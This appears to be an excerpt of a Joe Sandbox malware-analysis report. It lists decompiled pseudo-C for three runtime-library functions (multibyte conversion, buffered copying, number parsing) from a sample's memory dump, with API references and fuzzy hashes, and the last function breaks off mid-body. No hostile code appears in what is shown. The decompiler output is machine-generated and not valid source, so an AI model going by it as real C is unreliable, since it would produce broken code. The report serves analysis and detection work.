Function 0040E49C Relevance: 18.1, APIs: 12, Instructions: 139
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040E49C(short* _a4, int _a8, intOrPtr _a12, char* _a16, char _a20) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t35;
				int _t36;
				char _t37;
				char _t40;
				signed int _t46;
				void* _t48;
				void* _t49;
				char _t54;
				void* _t56;
				void* _t60;
				char _t63;
				char _t64;
				short* _t66;
				void* _t67;
				char _t68;
				char* _t79;
				void* _t80;
				char _t81;
				char* _t82;

				_t79 = _a8;
				if(_t79 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t79 != 0) {
						_t35 = _a20;
						__eflags = _t35;
						if(__eflags != 0) {
							_t81 =  *_t35;
							_t36 =  *((intOrPtr*)(_t35 + 4));
						} else {
							_t81 =  *(E004254CE(_t67, _t79, _t80, __eflags) + 8);
							_t36 = E00425482(_t67, _t79, _t81, __eflags);
						}
						_a8 = _t36;
						__eflags = _t81;
						if(_t81 != 0) {
							_t37 = E0040E3AE(_a8);
							_t82 = _a16;
							__eflags =  *_t82;
							_t68 = _t37;
							if( *_t82 == 0) {
								__eflags = _t68;
								if(__eflags != 0) {
									_t40 =  *( *((intOrPtr*)(_t68 + 4)) + ( *_t79 & 0x000000ff) + 0x1d) & 4;
									__eflags = _t40;
								} else {
									_t40 =  *(E0042506D(_t68, _t79, _t82, __eflags) + ( *_t79 & 0x000000ff) * 2) & 0x8000;
								}
								__eflags = _t40;
								if(_t40 == 0) {
									__eflags = _a4;
									__eflags = MultiByteToWideChar(_a8, 9, _t79, 1, _a4, 0 | _a4 != 0x00000000);
									if(__eflags != 0) {
										goto L13;
									}
									goto L20;
								} else {
									_t48 = E00425466(_t68, _t79, _t82, _t68);
									__eflags = _a12 - _t48;
									if(_a12 >= _t48) {
										_t49 = E00425466(_t68, _t79, _t82, _t68);
										__eflags = _t49 - 1;
										if(_t49 <= 1) {
											L29:
											__eflags = _t79[1];
											if(_t79[1] != 0) {
												L18:
												return E00425466(_t68, _t79, _t82, _t68);
											}
											L19:
											 *_t82 =  *_t82 & 0x00000000;
											__eflags =  *_t82;
											L20:
											_t46 = E00425667(__eflags);
											 *_t46 = 0x2a;
											return _t46 | 0xffffffff;
										}
										__eflags = _a4;
										_t54 = MultiByteToWideChar(_a8, 9, _t79, E00425466(_t68, _t79, _t82, _t68), _a4, 0 | _a4 != 0x00000000);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L18;
										}
										goto L29;
									}
									 *_t82 =  *_t79;
									_t56 = 0xfffffffe;
									return _t56;
								}
							}
							_t82[1] =  *_t79;
							_t60 = E00425466(_t68, _t79, _t82, _t68);
							__eflags = _t60 - 1;
							if(_t60 <= 1) {
								goto L19;
							}
							__eflags = _a4;
							_t63 = MultiByteToWideChar(_a8, 9, _t82, 2, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t63;
							if(_t63 == 0) {
								goto L19;
							}
							 *_t82 =  *_t82 & 0x00000000;
							__eflags =  *_t82;
							goto L18;
						} else {
							_t64 = _a4;
							__eflags = _t64;
							if(_t64 != 0) {
								 *_t64 =  *_t79 & 0x000000ff;
							}
							L13:
							return 1;
						}
					} else {
						_t66 = _a4;
						if(_t66 != 0) {
							 *_t66 = 0;
						}
						goto L5;
					}
				}
			}

0x0040e4a4
0x0040e4a9
0x0040e4c2
0x00000000
0x0040e4b1
0x0040e4b4
0x0040e4c9
0x0040e4cc
0x0040e4ce
0x0040e4df
0x0040e4e1
0x0040e4d0
0x0040e4d5
0x0040e4d8
0x0040e4d8
0x0040e4e4
0x0040e4e7
0x0040e4e9
0x0040e500
0x0040e505
0x0040e508
0x0040e50c
0x0040e50e
0x0040e564
0x0040e566
0x0040e586
0x0040e586
0x0040e568
0x0040e574
0x0040e574
0x0040e589
0x0040e58b
0x0040e5ea
0x0040e602
0x0040e604
0x00000000
0x00000000
0x00000000
0x0040e58d
0x0040e58e
0x0040e594
0x0040e597
0x0040e5a6
0x0040e5ac
0x0040e5af
0x0040e5d9
0x0040e5d9
0x0040e5dd
0x0040e542
0x00000000
0x0040e548
0x0040e54e
0x0040e54e
0x0040e54e
0x0040e551
0x0040e551
0x0040e556
0x00000000
0x0040e55c
0x0040e5b3
0x0040e5cb
0x0040e5d1
0x0040e5d3
0x00000000
0x00000000
0x00000000
0x0040e5d3
0x0040e59d
0x0040e59f
0x00000000
0x0040e59f
0x0040e58b
0x0040e513
0x0040e516
0x0040e51c
0x0040e51f
0x00000000
0x00000000
0x0040e523
0x0040e535
0x0040e53b
0x0040e53d
0x00000000
0x00000000
0x0040e53f
0x0040e53f
0x00000000
0x0040e4eb
0x0040e4eb
0x0040e4ee
0x0040e4f0
0x0040e4f5
0x0040e4f5
0x0040e4f8
0x00000000
0x0040e4fa
0x0040e4b6
0x0040e4b6
0x0040e4bb
0x0040e4bf
0x0040e4bf
0x00000000
0x0040e4bb
0x0040e4b4

APIs

____lc_handle_func.LIBCMT ref: 0040E4D0
____lc_codepage_func.LIBCMT ref: 0040E4D8
__GetLocaleForCP.LIBCPMT ref: 0040E500
____mb_cur_max_l_func.LIBCMT ref: 0040E516
MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000), ref: 0040E535
____mb_cur_max_l_func.LIBCMT ref: 0040E543
___pctype_func.LIBCMT ref: 0040E568
____mb_cur_max_l_func.LIBCMT ref: 0040E58E
____mb_cur_max_l_func.LIBCMT ref: 0040E5A6
____mb_cur_max_l_func.LIBCMT ref: 0040E5BE
MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,00000000), ref: 0040E5CB
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000), ref: 0040E5FC

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: ____mb_cur_max_l_func$ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
String ID:
API String ID: 3819326198-0
Opcode ID: b8d79650b37bacb989ab468d0d89f99c78cb2fe790598bac947bf9cca93e36f1
Instruction ID: f637fa44ebe088c4fa94eebe31e5f380a7948ace586a1ea42f5af9fcb8e451d5
Opcode Fuzzy Hash: b8d79650b37bacb989ab468d0d89f99c78cb2fe790598bac947bf9cca93e36f1
Instruction Fuzzy Hash: 7841E771214251BEDB205F33DC01B6A3B94EF00759F188D3BF865EA2D2E738C9A0DA59

Uniqueness

Uniqueness Score: -1.00%

Function 00416B50 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 384
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00416B50(intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, char _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _t230;
				intOrPtr _t261;
				intOrPtr _t286;
				intOrPtr* _t319;
				intOrPtr* _t348;
				intOrPtr _t357;
				intOrPtr _t364;
				intOrPtr _t369;
				signed int _t385;
				intOrPtr _t389;
				intOrPtr _t394;
				signed int _t409;
				intOrPtr _t411;
				signed int _t413;
				intOrPtr _t414;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t420;
				void* _t422;

				_t418 = __esi;
				_t417 = __edi;
				_v104 = __ecx;
				if(_a12 != 0) {
					_t4 =  &_a20; // 0x417027
					__eflags = _a16 |  *_t4;
					if(__eflags != 0) {
						_v12 = 0;
						_v8 = 0;
						_v16 = E004137E0( *((intOrPtr*)( *_v104 + 0xf8)),  *_v104, __eflags,  *((intOrPtr*)(_v104 + 8)),  *((intOrPtr*)(_v104 + 0xc)));
						asm("adc ecx, [ebp+0x18]"); // 0x417027
						_v112 = _a4 + _a16;
						_v108 = _a8;
						_v116 = _v16;
						__eflags = _v108 -  *((intOrPtr*)(_v116 + 0x2c));
						if(__eflags < 0) {
							L8:
							_v120 = _v16;
							_v124 =  *((intOrPtr*)( *_v104 + 0xf4));
							__eflags =  *((intOrPtr*)(_v120 + 0x2c)) -  *((intOrPtr*)(_v124 + 0x2c));
							if(__eflags > 0) {
								L29:
								_t364 =  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc))));
								_v60 = E00427900(_a4, _a8, _t364,  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)) + 4)));
								_v56 = _t364;
								_v156 = E00417E20(_v104 + 0x30);
								_v152 = 0;
								__eflags = _v56 - _v152;
								if(__eflags < 0) {
									L33:
									_push( *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)))));
									_t230 = E0040E131( *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)))), _t417, _t418, __eflags);
									_t420 = _t419 + 4;
									_v96 = _t230;
									_v72 = _v96;
									_t369 =  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc))));
									_v68 = E00427A40(_a4, _a8, _t369,  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)) + 4)));
									_v64 = _t369;
									while(1) {
										_t156 =  &_a20; // 0x417027
										__eflags = _v8 -  *_t156;
										if(__eflags > 0) {
											break;
										}
										if(__eflags < 0) {
											L37:
											_v164 = E00417E20(_v104 + 0x30);
											_v160 = 0;
											__eflags = _v56 - _v160;
											if(__eflags < 0) {
												L41:
												E00415C30( *_v104, _t417, _t418,  *((intOrPtr*)(E00417E40(_v104 + 0x30, _v60))),  *((intOrPtr*)(_t241 + 4)), _v72,  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)) + 4)));
												_t319 =  *((intOrPtr*)( *_v104 + 0xfc));
												asm("sbb eax, [ebp-0x3c]");
												_v84 =  *_t319 - _v68;
												_v80 =  *((intOrPtr*)(_t319 + 4));
												_t182 =  &_a20; // 0x417027
												asm("sbb edx, [ebp-0x4]");
												_v172 = _a16 - _v12;
												_v168 =  *_t182;
												__eflags = _v80 - _v168;
												if(__eflags < 0) {
													L45:
													E004224A0(_v12 + _a12, _v68 + _v72, _v84);
													_t420 = _t420 + 0xc;
													asm("adc edx, [ebp-0x4c]");
													_v12 = _v12 + _v84;
													asm("adc ecx, 0x0");
													_v60 = _v60 + 1;
													_v68 = 0;
													_v64 = 0;
													continue;
												}
												if(__eflags > 0) {
													L44:
													_t385 = _a16 - _v12;
													__eflags = _t385;
													_t191 =  &_a20; // 0x417027
													asm("sbb eax, [ebp-0x4]");
													_v84 = _t385;
													_v80 =  *_t191;
													goto L45;
												}
												__eflags = _v84 - _v172;
												if(_v84 <= _v172) {
													goto L45;
												}
												goto L44;
											}
											if(__eflags > 0) {
												L40:
												break;
											}
											__eflags = _v60 - _v164;
											if(_v60 < _v164) {
												goto L41;
											}
											goto L40;
										}
										__eflags = _v12 - _a16;
										if(_v12 >= _a16) {
											break;
										}
										goto L37;
									}
									_v100 = _v72;
									_push(_v100);
									E00422D00();
									L47:
									return _v12;
								}
								if(__eflags > 0) {
									L32:
									return 0;
								}
								__eflags = _v60 - _v156;
								if(__eflags < 0) {
									goto L33;
								}
								goto L32;
							}
							if(__eflags < 0) {
								L11:
								_t389 = _a4;
								_v28 = E00427900(_t389, _a8,  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0x100)))),  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0x100)) + 4)));
								_v24 = _t389;
								_v132 = E00417E20(_v104 + 0x30);
								_v128 = 0;
								__eflags = _v24 - _v128;
								if(__eflags < 0) {
									L15:
									_push( *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0x100)))));
									_t261 = E0040E131( *_v104, _t417, _t418, __eflags);
									_t422 = _t419 + 4;
									_v88 = _t261;
									_v40 = _v88;
									_t394 = _a8;
									_v36 = E00427A40(_a4, _t394,  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0x100)))),  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0x100)) + 4)));
									_v32 = _t394;
									while(1) {
										_t72 =  &_a20; // 0x417027
										__eflags = _v8 -  *_t72;
										if(__eflags > 0) {
											break;
										}
										if(__eflags < 0) {
											L19:
											_v140 = E00417E20(_v104 + 0x30);
											_v136 = 0;
											__eflags = _v24 - _v136;
											if(__eflags < 0) {
												L23:
												_t86 =  &_v28; // 0x417027
												E00416120( *_v104, _t417, _t418,  *((intOrPtr*)(E00417E40(_v104 + 0x30,  *_t86))),  *((intOrPtr*)(_t271 + 4)), _v40,  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)( *_v104 + 0xfc)) + 4)));
												_t348 =  *((intOrPtr*)( *_v104 + 0x100));
												asm("sbb eax, [ebp-0x1c]");
												_v52 =  *_t348 - _v36;
												_v48 =  *((intOrPtr*)(_t348 + 4));
												_t98 =  &_a20; // 0x417027
												asm("sbb edx, [ebp-0x4]");
												_v148 = _a16 - _v12;
												_v144 =  *_t98;
												__eflags = _v48 - _v144;
												if(__eflags < 0) {
													L27:
													E004224A0(_v12 + _a12, _v36 + _v40, _v52);
													_t422 = _t422 + 0xc;
													asm("adc edx, [ebp-0x2c]");
													_v12 = _v12 + _v52;
													_v36 = 0;
													_v32 = 0;
													_t122 =  &_v28; // 0x417027
													asm("adc ecx, 0x0");
													_v28 =  *_t122 + 1;
													continue;
												}
												if(__eflags > 0) {
													L26:
													_t409 = _a16 - _v12;
													__eflags = _t409;
													_t107 =  &_a20; // 0x417027
													asm("sbb eax, [ebp-0x4]");
													_v52 = _t409;
													_v48 =  *_t107;
													goto L27;
												}
												__eflags = _v52 - _v148;
												if(_v52 <= _v148) {
													goto L27;
												}
												goto L26;
											}
											if(__eflags > 0) {
												L22:
												break;
											}
											_t80 =  &_v28; // 0x417027
											__eflags =  *_t80 - _v140;
											if( *_t80 < _v140) {
												goto L23;
											}
											goto L22;
										}
										__eflags = _v12 - _a16;
										if(_v12 >= _a16) {
											break;
										}
										goto L19;
									}
									_v92 = _v40;
									_push(_v92);
									E00422D00();
									goto L47;
								}
								if(__eflags > 0) {
									L14:
									return 0;
								}
								_t57 =  &_v28; // 0x417027
								__eflags =  *_t57 - _v132;
								if(__eflags < 0) {
									goto L15;
								}
								goto L14;
							}
							_t411 = _v120;
							_t286 = _v124;
							__eflags =  *((intOrPtr*)(_t411 + 0x28)) -  *((intOrPtr*)(_t286 + 0x28));
							if( *((intOrPtr*)(_t411 + 0x28)) >=  *((intOrPtr*)(_t286 + 0x28))) {
								goto L29;
							}
							goto L11;
						}
						if(__eflags > 0) {
							L7:
							_t357 = _v16;
							_t413 =  *((intOrPtr*)(_t357 + 0x28)) - _a4;
							__eflags = _t413;
							asm("sbb eax, [ebp+0xc]");
							_a16 = _t413;
							_a20 =  *((intOrPtr*)(_t357 + 0x2c));
							goto L8;
						}
						_t414 = _v116;
						__eflags = _v112 -  *((intOrPtr*)(_t414 + 0x28));
						if(_v112 <=  *((intOrPtr*)(_t414 + 0x28))) {
							goto L8;
						}
						goto L7;
					}
					return 0;
				}
				return 0;
			}

0x00416b50
0x00416b50
0x00416b59
0x00416b60
0x00416b6e
0x00416b6e
0x00416b71
0x00416b7c
0x00416b83
0x00416ba5
0x00416bb1
0x00416bb7
0x00416bba
0x00416bbd
0x00416bc6
0x00416bc9
0x00416bed
0x00416bfb
0x00416bfe
0x00416c0a
0x00416c0d
0x00416e0a
0x00416e19
0x00416e29
0x00416e2c
0x00416e3c
0x00416e42
0x00416e4b
0x00416e51
0x00416e69
0x00416e76
0x00416e77
0x00416e7c
0x00416e7f
0x00416e85
0x00416e97
0x00416ea7
0x00416eaa
0x00416ead
0x00416eb0
0x00416eb0
0x00416eb3
0x00000000
0x00000000
0x00416eb9
0x00416ec7
0x00416ed4
0x00416eda
0x00416ee3
0x00416ee9
0x00416efd
0x00416f2e
0x00416f38
0x00416f46
0x00416f49
0x00416f4c
0x00416f55
0x00416f58
0x00416f5b
0x00416f61
0x00416f6a
0x00416f70
0x00416f91
0x00416fa3
0x00416fa8
0x00416fb4
0x00416fb7
0x00416fc6
0x00416fc9
0x00416fcf
0x00416fd6
0x00000000
0x00416fd6
0x00416f72
0x00416f7f
0x00416f82
0x00416f82
0x00416f85
0x00416f88
0x00416f8b
0x00416f8e
0x00000000
0x00416f8e
0x00416f77
0x00416f7d
0x00000000
0x00000000
0x00000000
0x00416f7d
0x00416eeb
0x00416ef8
0x00000000
0x00416ef8
0x00416ef0
0x00416ef6
0x00000000
0x00000000
0x00000000
0x00416ef6
0x00416ebe
0x00416ec1
0x00000000
0x00000000
0x00000000
0x00416ec1
0x00416fe5
0x00416feb
0x00416fec
0x00416ff4
0x00000000
0x00416ff7
0x00416e53
0x00416e60
0x00000000
0x00416e62
0x00416e58
0x00416e5e
0x00000000
0x00000000
0x00000000
0x00416e5e
0x00416c13
0x00416c27
0x00416c3d
0x00416c46
0x00416c49
0x00416c59
0x00416c5c
0x00416c62
0x00416c65
0x00416c7a
0x00416c87
0x00416c88
0x00416c8d
0x00416c90
0x00416c96
0x00416cab
0x00416cb8
0x00416cbb
0x00416cbe
0x00416cc1
0x00416cc1
0x00416cc4
0x00000000
0x00000000
0x00416cca
0x00416cd8
0x00416ce5
0x00416ceb
0x00416cf4
0x00416cfa
0x00416d0e
0x00416d24
0x00416d3f
0x00416d49
0x00416d57
0x00416d5a
0x00416d5d
0x00416d66
0x00416d69
0x00416d6c
0x00416d72
0x00416d7b
0x00416d81
0x00416da2
0x00416db4
0x00416db9
0x00416dc5
0x00416dc8
0x00416dce
0x00416dd5
0x00416ddc
0x00416de5
0x00416de8
0x00000000
0x00416deb
0x00416d83
0x00416d90
0x00416d93
0x00416d93
0x00416d96
0x00416d99
0x00416d9c
0x00416d9f
0x00000000
0x00416d9f
0x00416d88
0x00416d8e
0x00000000
0x00000000
0x00000000
0x00416d8e
0x00416cfc
0x00416d09
0x00000000
0x00416d09
0x00416cfe
0x00416d01
0x00416d07
0x00000000
0x00000000
0x00000000
0x00416d07
0x00416ccf
0x00416cd2
0x00000000
0x00000000
0x00000000
0x00416cd2
0x00416df6
0x00416dfc
0x00416dfd
0x00000000
0x00416e02
0x00416c67
0x00416c71
0x00000000
0x00416c73
0x00416c69
0x00416c6c
0x00416c6f
0x00000000
0x00000000
0x00000000
0x00416c6f
0x00416c15
0x00416c18
0x00416c1e
0x00416c21
0x00000000
0x00000000
0x00000000
0x00416c21
0x00416bcb
0x00416bd8
0x00416bd8
0x00416bde
0x00416bde
0x00416be4
0x00416be7
0x00416bea
0x00000000
0x00416bea
0x00416bcd
0x00416bd3
0x00416bd6
0x00000000
0x00000000
0x00000000
0x00416bd6
0x00000000
0x00416b75
0x00000000

Strings

'pA, xrefs: 00416D24, 00416DDC, 00416CFE, 00416C69, 00416D27
'pA, xrefs: 00416B6E, 00416BB1, 00416EB0, 00416F55, 00416F85, 00416CC1, 00416D66, 00416D96

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID:
String ID: 'pA$'pA
API String ID: 0-3312567464
Opcode ID: 5e82760292a3ee268dfc89fadb79e1451429728f38ccc1e96fa3bb5dda5d1b14
Instruction ID: 1adf96dadecec1e563f89ed819a02dd1759d9ca85ab7b7e13abb0dcc459911ca
Opcode Fuzzy Hash: 5e82760292a3ee268dfc89fadb79e1451429728f38ccc1e96fa3bb5dda5d1b14
Instruction Fuzzy Hash: BD029574A00209DFCB08DF99D591ADEB7F2BF89304F21829AE409AB355D734AD81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004427E0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004427E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t128;
				signed short _t129;
				void* _t131;
				signed int _t133;
				signed int _t135;
				void* _t136;
				intOrPtr _t148;
				intOrPtr* _t149;
				void* _t151;
				void* _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t170;
				void* _t171;
				void* _t173;
				void* _t177;
				void* _t178;
				signed int _t179;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr _t199;
				intOrPtr* _t209;
				intOrPtr _t211;
				intOrPtr _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;

				_t218 = __eflags;
				_push(0x64);
				E00425719(E0044F8CB, __ebx, __edi, __esi);
				_t211 =  *((intOrPtr*)(_t215 + 8));
				_t214 =  *((intOrPtr*)(_t215 + 0x10));
				 *(_t215 - 0x64) =  *(_t215 + 0xc);
				 *((intOrPtr*)(_t215 - 0x5c)) =  *((intOrPtr*)(_t215 + 0x14));
				_push( *((intOrPtr*)(_t215 + 0x1c)));
				_t187 = E0043DCE8(__ebx, __edx, _t211, _t214, _t218);
				_t192 = _t187;
				E0043E9B7(_t187, _t215 - 0x48);
				_t128 = 0;
				 *((intOrPtr*)(_t215 - 4)) = 0;
				if( *((intOrPtr*)(_t215 - 0x38)) != 0) {
					_t192 = _t187;
					_t128 =  *((intOrPtr*)( *_t187 + 8))() & 0x0000ffff;
				}
				_t212 = _t211 + 8;
				 *(_t215 - 0x68) = _t128;
				 *(_t215 - 0x60) = _t211 + 8;
				_t129 = E0043B943(_t192, 0x30, 0, _t211 + 8);
				_t217 = _t216 + 0xc;
				_t188 = _t129 & 0x0000ffff;
				_t193 = _t214;
				 *(_t215 - 0x54) =  *(_t215 - 0x64);
				_t131 = E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c)));
				if(_t131 != 0) {
					L12:
					_t133 =  *(_t215 + 0x18) & 0x00000e00;
					if(_t133 != 0x400) {
						__eflags = _t133 - 0x800;
						if(_t133 != 0x800) {
							asm("sbb eax, eax");
							_t135 =  ~_t133 & 0x0000000a;
							__eflags = _t135;
							 *(_t215 - 0x50) = _t135;
						} else {
							 *(_t215 - 0x50) = 0x10;
						}
					} else {
						 *(_t215 - 0x50) = 8;
					}
					 *(_t215 - 0x58) = 0;
					 *((char*)(_t215 - 0x49)) = 0;
					_t136 = E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c)));
					if(_t136 != 0) {
						L33:
						_t189 = 0;
						__eflags =  *(_t215 - 0x50);
						if( *(_t215 - 0x50) == 0) {
							goto L36;
						}
						goto L34;
					} else {
						if( *((intOrPtr*)(_t214 + 4)) == _t136) {
							E0043C83E(_t214);
						}
						if(( *(_t214 + 6) & 0x0000ffff) != _t188) {
							goto L33;
						} else {
							 *(_t215 - 0x58) = 1;
							E0043C86E(_t214);
							_t204 = _t214;
							_t170 = E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c)));
							if(_t170 != 0) {
								L31:
								_t189 = 0;
								__eflags =  *(_t215 - 0x50);
								if( *(_t215 - 0x50) != 0) {
									L34:
									__eflags =  *(_t215 - 0x50) - 0xa;
									if( *(_t215 - 0x50) == 0xa) {
										L36:
										 *((intOrPtr*)(_t215 - 0x6c)) = 0xa;
										L37:
										 *((intOrPtr*)(_t215 - 0x18)) = 0xf;
										 *(_t215 - 0x1c) = _t189;
										 *((char*)(_t215 - 0x2c)) = 0;
										E0040BFB0(_t215 - 0x2c, 1,  *(_t215 - 0x58));
										_t196 = _t214;
										 *((char*)(_t215 - 4)) = 1;
										 *((intOrPtr*)(_t215 - 0x70)) =  *(_t215 - 0x64) + 0x1f;
										if(E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c))) != 0) {
											L66:
											_t209 =  *((intOrPtr*)(_t215 - 0x48));
											if( *((intOrPtr*)(_t215 - 0x34)) < 0x10) {
												_t209 = _t215 - 0x48;
											}
											if( *(_t215 - 0x58) == 0) {
												L83:
												 *(_t215 - 0x54) =  *(_t215 - 0x64);
												goto L84;
											} else {
												while(_t189 != 0) {
													_t199 =  *_t209;
													if(_t199 == 0x7f) {
														break;
													}
													_t189 = _t189 - 1;
													if(_t189 == 0) {
														L75:
														if(_t189 != 0) {
															L79:
															if( *((char*)(_t209 + 1)) > 0) {
																_t209 = _t209 + 1;
															}
															continue;
														}
														_t149 =  *((intOrPtr*)(_t215 - 0x2c));
														if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
															_t149 = _t215 - 0x2c;
														}
														if(_t199 <  *_t149) {
															goto L83;
														} else {
															goto L79;
														}
													}
													_t148 =  *((intOrPtr*)(_t215 - 0x2c));
													if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
														_t148 = _t215 - 0x2c;
													}
													if(_t199 !=  *((intOrPtr*)(_t148 + _t189))) {
														goto L83;
													} else {
														goto L75;
													}
												}
												__eflags =  *((char*)(_t215 - 0x49));
												if( *((char*)(_t215 - 0x49)) == 0) {
													 *(_t215 - 0x54) =  *(_t215 - 0x54) + 1;
													 *( *(_t215 - 0x54)) = 0x30;
												}
												L84:
												 *( *(_t215 - 0x54)) = 0;
												E00402E20(_t215 - 0x2c, 1, 0);
												E00402E20(_t215 - 0x48, 1, 0);
												return E00425763(_t189, _t212, _t214);
											}
										} else {
											goto L38;
										}
										do {
											L38:
											if( *((char*)(_t214 + 4)) == 0) {
												_t196 = _t214;
												E0043C83E(_t214);
											}
											_t151 = E0043C06C(_t196,  *(_t214 + 6) & 0x0000ffff,  *(_t215 - 0x60));
											_t212 =  *(_t215 - 0x54);
											 *_t212 = _t151;
											_t153 = E00423130("0123456789abcdefABCDEF", _t151,  *((intOrPtr*)(_t215 - 0x6c)));
											_t217 = _t217 + 0x14;
											if(_t153 == 0) {
												__eflags =  *((intOrPtr*)(_t215 - 0x18)) - 0x10;
												_t154 =  *((intOrPtr*)(_t215 - 0x2c));
												if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
													_t154 = _t215 - 0x2c;
												}
												__eflags =  *((char*)(_t154 + _t189));
												if( *((char*)(_t154 + _t189)) == 0) {
													break;
												} else {
													_t212 =  *(_t215 - 0x68);
													__eflags = _t212;
													if(_t212 == 0) {
														break;
													}
													__eflags =  *((char*)(_t214 + 4));
													if( *((char*)(_t214 + 4)) == 0) {
														E0043C83E(_t214);
													}
													__eflags =  *(_t214 + 6) - _t212;
													if( *(_t214 + 6) != _t212) {
														break;
													} else {
														E00403B10(_t215 - 0x2c, 1, 0);
														_t189 = _t189 + 1;
														__eflags = _t189;
														goto L59;
													}
												}
											} else {
												if( *((char*)(_t215 - 0x49)) != 0 ||  *_t212 != 0x30) {
													if(_t212 <  *((intOrPtr*)(_t215 - 0x70))) {
														 *(_t215 - 0x54) = _t212;
														 *((char*)(_t215 - 0x49)) = 1;
													}
												}
												_t161 =  *((intOrPtr*)(_t215 - 0x2c));
												 *(_t215 - 0x58) = 1;
												if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
													_t161 = _t215 - 0x2c;
												}
												if( *((char*)(_t161 + _t189)) != 0x7f) {
													_t162 =  *((intOrPtr*)(_t215 - 0x2c));
													if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
														_t162 = _t215 - 0x2c;
													}
													 *((char*)(_t162 + _t189)) =  *((char*)(_t162 + _t189)) + 1;
												}
											}
											L59:
											E0043C86E(_t214);
											_t196 = _t214;
										} while (E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c))) == 0);
										if(_t189 != 0) {
											_t155 =  *((intOrPtr*)(_t215 - 0x2c));
											if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
												_t155 = _t215 - 0x2c;
											}
											if( *((char*)(_t155 + _t189)) <= 0) {
												 *(_t215 - 0x58) = 0;
											} else {
												_t189 = _t189 + 1;
											}
										}
										goto L66;
									}
									L35:
									 *((intOrPtr*)(_t215 - 0x6c)) = ((0 |  *(_t215 - 0x50) != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
									goto L37;
								}
								 *(_t215 - 0x50) = 8;
